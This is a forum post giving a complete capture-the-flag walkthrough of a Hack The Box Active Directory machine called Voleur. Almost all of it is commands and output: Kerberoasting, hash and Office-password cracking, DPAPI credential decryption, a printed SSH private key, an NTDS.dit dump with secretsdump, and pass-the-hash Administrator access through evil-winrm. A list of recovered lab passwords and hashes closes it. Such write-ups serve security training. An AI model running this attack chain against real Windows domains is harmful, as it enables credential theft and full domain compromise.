07-07-25, 09:17 PM
TARGET : VOLEUR.HTB,
I can provide my personal notes for the machine if anyone is interested.
Krb5.conf
Initial TGT generation - ryan.naylor
SMB enumeration
Download encrypted Excel file
Crack Excel password
Result:
Decrypt and extract credentials
Extracted credentials:
Targeted Kerberoasting
Extracted TGS hash:
Crack TGS hash
Result:
WinRM access
Restore deleted user Todd.Wolfe
Access Todd.Wolfe SMB share
DPAPI credential extraction
Found DPAPI protected credentials in AppData/Roaming/Microsoft/
Extract masterkey:
Masterkey result:
Decrypt credentials:
DPAPI result:
Jeremy.combs access
SSH key discovery
Found in SMB share:
note.txt.txt:
id_rsa:
SSH access to svc_backup via WSL
AD database extraction
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
Extract NTLM hashes
Administrator hash:
Root access
Credentials summary
I can provide my personal notes for the machine if anyone is interested.
Code:
IP: 10.10.11.76 Domain: voleur.htb DC: dc.voleur.htbKrb5.conf
Code:
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTBInitial TGT generation - ryan.naylor
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccacheSMB enumeration
Code:
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"Download encrypted Excel file
Code:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share ITCrack Excel password
Code:
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txtResult:
Code:
football1Decrypt and extract credentials
Code:
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'Extracted credentials:
Code:
Todd.Wolfe - Password was reset to NightT1meP1dg3on14 and account deleted
svc_ldap - P/W - M1XyC9pW7qT5Vn
svc_iis - P/W - N5pXyW1VqM7CZ8Targeted Kerberoasting
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txtExtracted TGS hash:
Code:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106Crack TGS hash
Code:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txtResult:
Code:
svc_winrm:AFireInsidedeOzarctica980219afiWinRM access
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILE:svc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTBRestore deleted user Todd.Wolfe
Code:
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfeAccess Todd.Wolfe SMB share
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfeDPAPI credential extraction
Found DPAPI protected credentials in AppData/Roaming/Microsoft/
Extract masterkey:
Code:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"Masterkey result:
Code:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83Decrypt credentials:
Code:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83DPAPI result:
Code:
Username: jeremy.combs Password: qT3V9pLXyN7W4mJeremy.combs access
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (work but useless)
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htbSSH key discovery
Found in SMB share:
note.txt.txt:
Code:
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Adminid_rsa:
Code:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----SSH access to svc_backup via WSL
Code:
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htbAD database extraction
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
Code:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEMCode:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCALAdministrator hash:
Code:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::Root access
Code:
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTBCredentials summary
Code:
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)